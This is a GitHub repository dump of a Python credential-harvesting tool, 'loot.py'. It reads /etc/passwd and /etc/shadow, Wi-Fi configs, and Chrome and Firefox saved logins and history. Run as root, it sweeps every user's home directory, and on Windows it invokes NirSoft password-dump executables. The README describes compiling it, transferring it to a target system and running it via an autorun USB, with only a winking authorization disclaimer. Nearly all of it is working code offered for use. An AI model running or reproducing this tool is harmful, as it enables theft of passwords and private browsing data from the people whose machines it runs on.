├── .gitattributes ├── LICENSE ├── README.md ├── demo_data_20180101_22h14m41s ├── chromed.txt ├── firefoxd.txt ├── report.txt ├── system.txt └── web.txt ├── loot.py ├── modsLin.py ├── modsLin.pyc ├── modsMac.py ├── modsMac.pyc ├── modsWin.py ├── modsWin.pyc └── windows ├── ChromePass.exe ├── Dialupass.exe ├── PasswordFox.exe ├── PstPassword.exe ├── WebBrowserPassView.exe ├── iepv.exe ├── mailpv.exe ├── mspass.exe ├── netpass.exe └── x64 ├── PasswordFox.exe └── netpass.exe /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Dishant Rathi 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Password Recovery using Python 2 | 3 | [@techiedishant](https://www.twitter.com/techiedishant) 4 | 5 | A python script to automate gathering passwords and information from the current user and operating system. 6 | 7 | ## Getting Started 8 | 9 | These instructions will get you a copy of the project up and running on your local machine for development and testing purposes. 10 | 11 | ``` 12 | git clone https://github.com/dishantrathi/Password-Recovery-using-Python.git 13 | ``` 14 | ### Prerequisites 15 | 16 | * [Python v3.6](https://www.python.org/) - As Base 17 | 18 | ## Running 19 | 20 | To run the program, simply execute 21 | 22 | * For Windows 23 | ``` 24 | py loot.py 25 | ``` 26 | * For Linux 27 | ``` 28 | python3 loot.py 29 | ``` 30 | 31 | ## Help Section 32 | 33 | More Simple than you think. Run the loot.py file. 34 | 35 | 1) What is loot? 36 | 37 | A python script to automate gathering passwords and information from the current user and operating system. 38 | 39 | 2) Configuration 40 | 41 | In order to use loot on a Windows system, you will need the executables provided by NirSoft (password tools). 42 | 43 | NirSoft's Password Recovery Tools: 44 | http://nirsoft.net/password_recovery_tools.html 45 | http://www.nirsoft.net/utils/wireless_key.html 46 | 47 | * Make sure to download tools with command-line options. [Provided Already] 48 | 49 | Extract these to a folder named windows in the same directory where you currently have this script. 50 | 51 | 3) Execution 52 | 53 | Compile for desired operating system (Linux, OSX, Win).You can use either PyInstaller or Py2Exe for that! Then simply transfer file to system and execute it. 54 | 55 | - For use in computer systems where you are authorized! ;) 56 | 57 | ## Ethical-Hacking Section 58 | 59 | Create an Autorun File and Execute through a USB Device or Pendrive. 60 | 61 | ## License 62 | 63 | This project is licensed under the MIT License - see the [LICENSE.md](LICENSE.md) file for details 64 | -------------------------------------------------------------------------------- /demo_data_20180101_22h14m41s/chromed.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/demo_data_20180101_22h14m41s/chromed.txt -------------------------------------------------------------------------------- /demo_data_20180101_22h14m41s/firefoxd.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /demo_data_20180101_22h14m41s/report.txt: -------------------------------------------------------------------------------- 1 | ________________________________ 2 | | 3 | - Loot.py (20180101_22h14m41s) | 4 | - User: localhost | 5 | ________________________________| 6 | 7 | - System Info: 8 | [*] Windows (AMD64) 9 | [*] Windows 10 (10.0.16299) 10 | 11 | - Looting Windows... 12 | [e] Network: Access denied. 13 | [e] Wi-Fi: Access denied. 14 | [*] Found browser passwords. 15 | [*] Found chrome passwords. 16 | [*] Found firefox passwords. 17 | 18 | - Looted: [ 3 / 7 ] 19 | -------------------------------------------------------------------------------- /demo_data_20180101_22h14m41s/system.txt: -------------------------------------------------------------------------------- 1 | Windows 2 | AMD64 3 | Windows-10-10.0.16299-SP0 4 | 10.0.16299 5 | localhost 6 | Windows 7 | DESKTOP-160G49T 8 | 10 9 | 10.0.16299 10 | AMD64 11 | Intel64 Family 6 Model 61 Stepping 4, GenuineIntel 12 | -------------------------------------------------------------------------------- /demo_data_20180101_22h14m41s/web.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/demo_data_20180101_22h14m41s/web.txt -------------------------------------------------------------------------------- /loot.py: -------------------------------------------------------------------------------- 1 | # import libs 2 | import os 3 | import sys 4 | import getpass 5 | import platform 6 | from datetime import datetime 7 | 8 | # get linux distro 9 | def linux_distro(): 10 | try: 11 | return platform.linux_distribution() 12 | except: 13 | return "N/A" 14 | 15 | # store report 16 | reports = '' 17 | sysInfo = '' 18 | verbose = True 19 | if len(sys.argv) > 0: 20 | arg1 = sys.argv 21 | if len(arg1) > 1: 22 | if arg1[1] == "-s": verbose = False 23 | # load all OS info 24 | OS_type = platform.system() 25 | OS_mach = platform.machine() 26 | OS_plat = platform.platform() 27 | OS_vers = platform.version() 28 | Mc_vers = platform.mac_ver() 29 | OS_uname= platform.uname() 30 | Lx_dist = linux_distro() 31 | OS_user = getpass.getuser() 32 | # add to sysInfo for full system report 33 | sysInfo += str(OS_type) + '\n' + str(OS_mach) + '\n' + str(OS_plat) + '\n' + str(OS_vers) + '\n' + str(OS_user) + '\n' 34 | aa = 0 35 | while aa < len(OS_uname): 36 | if len(OS_uname[aa]) > 0: sysInfo += str(OS_uname[aa]) + '\n' 37 | aa += 1 38 | # report directory will be date + time 39 | dirName = datetime.now().strftime('%Y%m%d_%Hh%Mm%Ss') 40 | # total amount of passwords found / total of modules 41 | found = 0 42 | total = 0 43 | 44 | # show OS info 45 | def showInfo(): 46 | global reports 47 | reports += '_' * 32 + '\n' 48 | reports += ' |' + '\n' 49 | reports += ' - Loot.py (' + dirName + ') |' + '\n' 50 | reports += ' - User: ' + str(OS_user) + ' ' * (31 - 10 - len(str(OS_user))) + '|' + '\n' 51 | reports += '_' * 32 + '|\n' 52 | # show initial info. 53 | showInfo() 54 | 55 | # create directory for this report 56 | if not os.path.exists(dirName): 57 | os.makedirs(dirName) 58 | 59 | # first we load more OS info 60 | # then run loot modules ::) 61 | try: 62 | sysname, nodename, release, version, machine = os.uname() 63 | sysinfo = {'os.sysname':sysname, 'os.hostname':nodename, 'os.version.number':release, 64 | 'os.version.string':version, 'os.arch':machine} 65 | sysInfo += sysname + '\n' + nodename + '\n' + release + '\n' + version + '\n' + machine 66 | except: 67 | sysname, nodename, release, version, machine = OS_uname[0],OS_uname[1],OS_vers,OS_uname[2],OS_uname[3] 68 | reports += '\n - System Info:\n' 69 | reports += '[*] ' + OS_type + ' (' + OS_mach + ')' + '\n' 70 | if OS_type == "Linux": 71 | from modsLin import linLoot 72 | reports += '[*] ' + str(Lx_dist[0]) + sysname + ' (' + release + ')\n' 73 | reports += linLoot(OS_user) 74 | total = 6 # total number modules (linux) 75 | if OS_type == "Windows": 76 | from modsWin import winLoot 77 | reports += '[*] ' + sysname + ' ' + version + ' (' + release + ')\n' 78 | reports += winLoot() 79 | total = 7 # total number modules (windows) 80 | if OS_type == "Darwin": 81 | reports += '[*] ' + sysname + ' ' + platform.mac_ver()[0] + ' (' + release + ')\n' 82 | from modsMac import macLoot 83 | reports += macLoot(OS_user) 84 | total = 4 # total number modules (osx) 85 | 86 | # move all files to report folder 87 | def cleanFiles(): 88 | global found 89 | # Text file dump 90 | for file in os.listdir("."): 91 | if file.endswith(".txt") or file.endswith(".json") or file.endswith(".db") or file.endswith(".csv"): 92 | if os.path.getsize(file) > 0: 93 | if OS_type == "Windows": os.rename(file, dirName + '\\' + file) 94 | if OS_type == "Linux" or OS_type == "Darwin": os.rename(file, dirName + '/' + file) 95 | if file[:2] == 'NS' and file == 'NS-1.txt': found += 1 96 | if file[:2] != 'NS' and file.endswith(".db") == False and file != 'report.txt': found += 1 97 | else: os.remove(file) 98 | 99 | # move files at the end of script 100 | cleanFiles() 101 | 102 | # now write report file 103 | reports += '\n - Looted: [ ' + str(found) + ' / ' + str(total) + ' ]\n' 104 | f = open('report.txt', 'w') 105 | if len(reports) > 1: f.write(reports) 106 | f.close() 107 | # now write system file 108 | f = open('system.txt', 'w') 109 | if len(sysInfo) > 1: f.write(sysInfo) 110 | f.close() 111 | 112 | if OS_type == "Windows": 113 | os.rename('report.txt', dirName + '\\' + 'report.txt') 114 | os.rename('system.txt', dirName + '\\' + 'system.txt') 115 | if OS_type == "Linux" or OS_type == "Darwin": 116 | os.rename('report.txt', dirName + '/' + 'report.txt') 117 | os.rename('system.txt', dirName + '/' + 'system.txt') 118 | 119 | # at the end, if we are running verbose, print output 120 | if verbose == True: print(reports) -------------------------------------------------------------------------------- /modsLin.py: -------------------------------------------------------------------------------- 1 | import os 2 | import pwd, grp 3 | import subprocess 4 | 5 | reports = '' 6 | 7 | # find child directories 8 | def getChildir(a_dir): 9 | try: 10 | return [name for name in os.listdir(a_dir) 11 | if os.path.isdir(os.path.join(a_dir, name))] 12 | except: 13 | return False 14 | 15 | # find users in system 16 | def enumUsers(): 17 | global reports 18 | fullPath = '/home/' 19 | childirs = getChildir(fullPath) 20 | if childirs: 21 | xx = 0 22 | while xx < len(childirs): 23 | # go thru all users and try to loot them.. 24 | if childirs[xx] != 'lost+found' and childirs[xx] != 'ftp': 25 | try: 26 | reports += '\n' 27 | lootUser = fullPath + childirs[xx] 28 | lootChrome(lootUser) 29 | lootFirefox(lootUser) 30 | except: 31 | break 32 | xx += 1 33 | 34 | # main module will loot for passwords in linux 35 | def linLoot(m): 36 | global reports 37 | reports += '\n - Looting Linux...\n' 38 | # List Users 39 | me = m 40 | 41 | # User passwords 42 | fullPath = '/etc/passwd' 43 | if os.path.isfile(fullPath): 44 | try: 45 | f = open(fullPath, 'r') 46 | c = f.read() 47 | if len(c) > 10: 48 | reports += '[*] Found /etc/passwd.\n' 49 | FF = open('passwd.txt', 'w') 50 | FF.write(c) 51 | FF.close() 52 | except: reports += '[e] Passwd: Access denied.\n' 53 | 54 | # User shadow passwords 55 | fullPath = '/etc/shadow' 56 | if os.path.isfile(fullPath): 57 | try: 58 | f = open(fullPath, 'r') 59 | c = f.read() 60 | if len(c) > 10: 61 | reports += '[*] Found /etc/shadow.\n' 62 | FF = open('shadow.txt', 'w') 63 | FF.write(c) 64 | FF.close() 65 | except: reports += '[e] Shadow: Access denied.\n' 66 | 67 | # Network passwords (wifi, etc) 68 | fullPath = '/etc/NetworkManager/system-connections/' 69 | childInt = 0 70 | for path, subdirs, files in os.walk(fullPath): 71 | for name in files: 72 | try: 73 | f = open(fullPath + '/' + name, 'r') 74 | c = f.read() 75 | if len(c) > 10: 76 | if childInt == 0: 77 | reports += '[*] Found NetworkManager.\n' 78 | childInt += 1 79 | fn = 'NS-' + str(childInt) + '.txt' 80 | FF = open(fn, 'w') 81 | FF.write(c) 82 | FF.close() 83 | except: 84 | reports += '[e] Network: Access denied.\n' 85 | break 86 | if me != 'root': 87 | reports += '' 88 | lootChrome(0) 89 | lootFirefox(0) 90 | # if we are running as root, lets enum other users 91 | if me == 'root': enumUsers() 92 | # return any reports 93 | return reports 94 | 95 | # get chrome pass' from any user [default = current] 96 | def lootChrome(ii): 97 | global reports 98 | if ii == 0: homePath = os.path.expanduser('~') 99 | else: homePath = ii 100 | looted = 0 101 | # Google chrome passwords 102 | fullPath = homePath + '/.config/google-chrome/Default/Login Data' 103 | if os.path.exists(fullPath): 104 | f = open(fullPath, 'r') 105 | c = f.read() 106 | # if we actually found passwords, write to text file... 107 | if len(c) > 10: 108 | try: 109 | looted += 1 110 | reports += '[*] Found chrome passwords.\n' 111 | fn = str(homePath.rsplit('/', 1)[-1]) + '-chromelogins.csv' 112 | p1 = subprocess.Popen(['sqlite3', '-header', '-csv', '-separator', 113 | ',',fullPath, 'SELECT * FROM logins'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) 114 | p2 = p1.stdout.read() 115 | p3 = p1.stderr.read() 116 | if len(p2) > 1: 117 | FF = open(fn, 'w') 118 | FF.write(p2) 119 | FF.close() 120 | if len(p3) > 1: 121 | reports += '[e] ' + str(p3) + '\n' 122 | except: reports += '[e] Chrome: Database locked.\n' 123 | f.close() 124 | # Google chrome history 125 | fullPath = homePath + '/.config/google-chrome/Default/History' 126 | if os.path.exists(fullPath): 127 | f = open(fullPath, 'r') 128 | c = f.read() 129 | # if we actually found passwords, write to text file... 130 | if len(c) > 10: 131 | try: 132 | looted += 1 133 | reports += '[*] Found chrome history.\n' 134 | fn = str(homePath.rsplit('/', 1)[-1]) + '-chromehistory.csv' 135 | p1 = subprocess.Popen(['sqlite3', '-header', '-csv', '-separator', 136 | ',',fullPath, 'SELECT * FROM urls'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) 137 | p2 = p1.stdout.read() 138 | p3 = p1.stderr.read() 139 | if len(p2) > 1: 140 | FF = open(fn, 'w') 141 | FF.write(p2) 142 | FF.close() 143 | if len(p3) > 1: 144 | reports += '[e] ' + str(p3) + '\n' 145 | except: 146 | reports += ' Try killing the process.\n' 147 | f.close() 148 | if looted > 0: reports += ' User: ' + str(homePath.rsplit('/', 1)[-1]) + '\n' 149 | 150 | # get firefox pass' from any user [default = current] 151 | def lootFirefox(ii): 152 | global reports 153 | if ii == 0: homePath = os.path.expanduser('~') 154 | else: homePath = ii 155 | # Mozilla firefox passwords 156 | fullPath = homePath + '/.mozilla/firefox/' 157 | if os.path.exists(fullPath): 158 | childirs = getChildir(fullPath) 159 | # if there is only 1 directory 160 | if len(childirs) == 1: 161 | fullPath = homePath + '/.mozilla/firefox/' + childirs[0] + '/logins.json' 162 | if os.path.isfile(fullPath): 163 | f = open(fullPath, 'r') 164 | c = f.read() 165 | # if we actually found passwords, write to text file... 166 | if len(c) > 10: 167 | try: 168 | reports += '[*] Found firefox passwords.\n' 169 | reports += ' User: ' + str(homePath.rsplit('/', 1)[-1]) + '\n' 170 | fn = str(homePath.rsplit('/', 1)[-1]) + '-logins.json' 171 | FF = open(fn, 'w') 172 | FF.write(c) 173 | FF.close() 174 | except: 175 | reports += '[e] Firefox: No logins.\n' 176 | f.close() 177 | fullPath = homePath + '/.mozilla/firefox/' + childirs[0] + '/key3.db' 178 | if os.path.isfile(fullPath): 179 | f = open(fullPath, 'r') 180 | c = f.read() 181 | # if we actually found passwords, write to text file... 182 | if len(c) > 10: 183 | try: 184 | fn = str(homePath.rsplit('/', 1)[-1]) + '-key3.db' 185 | FF = open(fn, 'w') 186 | FF.write(c) 187 | FF.close() 188 | except: 189 | reports += '[e] Firefox: Database Locked.\n' 190 | reports += ' Try killing the process.\n' 191 | f.close() -------------------------------------------------------------------------------- /modsLin.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/modsLin.pyc -------------------------------------------------------------------------------- /modsMac.py: -------------------------------------------------------------------------------- 1 | import os 2 | import subprocess 3 | 4 | reports = '' 5 | 6 | # find child directories 7 | def getChildir(a_dir): 8 | try: 9 | return [name for name in os.listdir(a_dir) 10 | if os.path.isdir(os.path.join(a_dir, name))] 11 | except: 12 | return False 13 | 14 | # find users in system 15 | def enumUsers(): 16 | global reports 17 | fullPath = '/Users/' 18 | childirs = getChildir(fullPath) 19 | if childirs: 20 | xx = 0 21 | while xx < len(childirs): 22 | # go thru all users and try to loot them.. 23 | if childirs[xx] != '.localized' and childirs[xx] != 'Shared': 24 | try: 25 | reports += '\n' 26 | lootUser = fullPath + childirs[xx] 27 | lootChrome(lootUser) 28 | lootFirefox(lootUser) 29 | except: 30 | break 31 | xx += 1 32 | 33 | # main module will loot for passwords in mac 34 | def macLoot(m): 35 | global reports 36 | me = m 37 | reports += '\n - Looting Mac...\n' 38 | 39 | # User passwords 40 | fullPath = '/etc/passwd' 41 | if os.path.isfile(fullPath): 42 | try: 43 | f = open(fullPath, 'r') 44 | c = f.read() 45 | if len(c) > 10: 46 | reports += '[*] Found /etc/passwd.\n' 47 | FF = open('passwd.txt', 'w') 48 | FF.write(c) 49 | FF.close() 50 | except: reports += '[e] Passwd: Access denied.\n' 51 | 52 | if me != 'root': 53 | reports += '' 54 | lootChrome(0) 55 | lootFirefox(0) 56 | # if we are running as root, lets enum other users 57 | if me == 'root': enumUsers() 58 | # return any reports 59 | return reports 60 | 61 | # get chrome pass' from any user [default = current] 62 | def lootChrome(ii): 63 | global reports 64 | if ii == 0: homePath = os.path.expanduser('~') 65 | else: homePath = ii 66 | looted = 0 67 | # Google chrome passwords 68 | fullPath = homePath + '/Library/Application Support/Google/Chrome/Default/Login Data' 69 | if os.path.exists(fullPath): 70 | f = open(fullPath, 'r') 71 | c = f.read() 72 | # if we actually found passwords, write to text file... 73 | if len(c) > 10: 74 | try: 75 | looted += 1 76 | reports += '[*] Found chrome passwords.\n' 77 | fn = str(homePath.rsplit('/', 1)[-1]) + '-chromelogins.csv' 78 | p1 = subprocess.Popen(['sqlite3', '-header', '-csv', '-separator', 79 | ',',fullPath, 'SELECT * FROM logins'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) 80 | p2 = p1.stdout.read() 81 | p3 = p1.stderr.read() 82 | if len(p2) > 1: 83 | FF = open(fn, 'w') 84 | FF.write(p2) 85 | FF.close() 86 | if len(p3) > 1: reports += '[e] ' + str(p3) + '\n' 87 | except: 88 | reports += '[e] Chrome: Database Locked.\n' 89 | f.close() 90 | # Google chrome history 91 | fullPath = homePath + '/Library/Application Support/Google/Chrome/Default/History' 92 | if os.path.exists(fullPath): 93 | f = open(fullPath, 'r') 94 | c = f.read() 95 | # if we actually found passwords, write to text file... 96 | if len(c) > 10: 97 | try: 98 | looted += 1 99 | reports += '[*] Found chrome history.\n' 100 | fn = str(homePath.rsplit('/', 1)[-1]) + '-chromehistory.csv' 101 | p1 = subprocess.Popen(['sqlite3', '-header', '-csv', '-separator', 102 | ',',fullPath, 'SELECT * FROM urls'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) 103 | p2 = p1.stdout.read() 104 | p3 = p1.stderr.read() 105 | if len(p2) > 1: 106 | FF = open(fn, 'w') 107 | FF.write(p2) 108 | FF.close() 109 | if len(p3) > 1: 110 | reports += '[e] ' + str(p3) + '\n' 111 | reports += '[*] Try killing chrome:\n' 112 | reports += ' ps aux | grep Chrome\n' 113 | reports += ' kill [process ID]\n\n' 114 | except: 115 | reports += '[e] Chrome: Database Locked.\n' 116 | f.close() 117 | if looted > 0: reports += ' User: ' + str(homePath.rsplit('/', 1)[-1]) + '\n' 118 | 119 | # get firefox pass' from any user [default = current] 120 | def lootFirefox(ii): 121 | global reports 122 | if ii == 0: homePath = os.path.expanduser('~') 123 | else: homePath = ii 124 | # Mozilla firefox passwords 125 | fullPath = homePath + '/Library/Application Support/Firefox/Profiles/' 126 | if os.path.exists(fullPath): 127 | childirs = getChildir(fullPath) 128 | # if there is only 1 directory 129 | if len(childirs) == 1: 130 | fullPath = homePath + '/Library/Application Support/Firefox/Profiles/' + childirs[0] + '/logins.json' 131 | if os.path.isfile(fullPath): 132 | f = open(fullPath, 'r') 133 | c = f.read() 134 | # if we actually found passwords, write to text file... 135 | if len(c) > 10: 136 | reports += '[*] Found firefox passwords.\n' 137 | reports += ' User: ' + str(homePath.rsplit('/', 1)[-1]) + '\n' 138 | fn = str(homePath.rsplit('/', 1)[-1]) + '-logins.json' 139 | FF = open(fn, 'w') 140 | FF.write(c) 141 | FF.close() 142 | f.close() 143 | fullPath = homePath + '/Library/Application Support/Firefox/Profiles' + childirs[0] + '/key3.db' 144 | if os.path.isfile(fullPath): 145 | f = open(fullPath, 'r') 146 | c = f.read() 147 | # if we actually found passwords, write to text file... 148 | if len(c) > 10: 149 | fn = str(homePath.rsplit('/', 1)[-1]) + '-key3.db' 150 | FF = open(fn, 'w') 151 | FF.write(c) 152 | FF.close() 153 | f.close() -------------------------------------------------------------------------------- /modsMac.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/modsMac.pyc -------------------------------------------------------------------------------- /modsWin.py: -------------------------------------------------------------------------------- 1 | import os 2 | import subprocess 3 | 4 | reports = '' 5 | 6 | # main module will loot for passwords in windows 7 | def winLoot(): 8 | global reports 9 | reports += '\n - Looting Windows...\n' 10 | # Network passwords 11 | try: 12 | subprocess.call(['windows\netpass.exe', '/stext', 'netpass.txt']) 13 | if os.path.isfile('netpass.txt') and os.path.getsize('netpass.txt') > 0: 14 | reports += '[*] Found network passwords.\n' 15 | except: reports += '[e] Network: Access denied.\n' 16 | # Wireless passwords 17 | try: 18 | subprocess.call(['windows\WirelessKeyView.exe', '/stext', 'wifi.txt']) 19 | if os.path.isfile('wifi.txt') and os.path.getsize('wifi.txt') > 0: 20 | reports += '[*] Found wi-fi passwords.\n' 21 | except: reports += '[e] Wi-Fi: Access denied.\n' 22 | # Browser passwords 23 | try: 24 | subprocess.call(['windows\WebBrowserPassView.exe', '/stext', 'web.txt']) 25 | if os.path.isfile('web.txt') and os.path.getsize('web.txt') > 0: 26 | reports += '[*] Found browser passwords.\n' 27 | except: reports += '[e] Browser: Access denied.\n' 28 | # Chrome passwords 29 | try: 30 | subprocess.call(['windows\ChromePass.exe', '/stext', 'chromed.txt']) 31 | if os.path.isfile('chromed.txt') and os.path.getsize('chromed.txt') > 0: 32 | reports += '[*] Found chrome passwords.\n' 33 | except: reports += '[e] Chrome: Access denied.\n' 34 | # Firefox passwords 35 | try: 36 | subprocess.call(['windows\PasswordFox.exe', '/stext', 'firefoxd.txt']) 37 | if os.path.isfile('firefoxd.txt') and os.path.getsize('firefoxd.txt') > 0: 38 | reports += '[*] Found firefox passwords.\n' 39 | except: reports += '[e] Firefox: Access denied.\n' 40 | # Email passwords 41 | try: 42 | subprocess.call(['windows\mailpv.exe', '/stext', 'email.txt']) 43 | if os.path.isfile('email.txt') and os.path.getsize('email.txt') > 0: 44 | reports += '[*] Found email passwords.\n' 45 | except: reports += '[e] Email: Access denied.\n' 46 | # Messenger passwords 47 | try: 48 | subprocess.call(['windows\mspass.exe', '/stext', 'chat.txt']) 49 | if os.path.isfile('chat.txt') and os.path.getsize('chat.txt') > 0: 50 | reports += '[*] Found messaging passwords.\n' 51 | except: reports += '[e] Messaging: Access denied.\n' 52 | return reports -------------------------------------------------------------------------------- /modsWin.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/modsWin.pyc -------------------------------------------------------------------------------- /windows/ChromePass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/windows/ChromePass.exe -------------------------------------------------------------------------------- /windows/Dialupass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/windows/Dialupass.exe -------------------------------------------------------------------------------- /windows/PasswordFox.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/windows/PasswordFox.exe -------------------------------------------------------------------------------- /windows/PstPassword.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/windows/PstPassword.exe -------------------------------------------------------------------------------- /windows/WebBrowserPassView.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/windows/WebBrowserPassView.exe -------------------------------------------------------------------------------- /windows/iepv.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/windows/iepv.exe -------------------------------------------------------------------------------- /windows/mailpv.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/windows/mailpv.exe -------------------------------------------------------------------------------- /windows/mspass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/windows/mspass.exe -------------------------------------------------------------------------------- /windows/netpass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/windows/netpass.exe -------------------------------------------------------------------------------- /windows/x64/PasswordFox.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/windows/x64/PasswordFox.exe -------------------------------------------------------------------------------- /windows/x64/netpass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dishantrathi/Password-Recovery-using-Python/0ab9304f7cd2b5fe327fa67b092c2ffbed135b0a/windows/x64/netpass.exe --------------------------------------------------------------------------------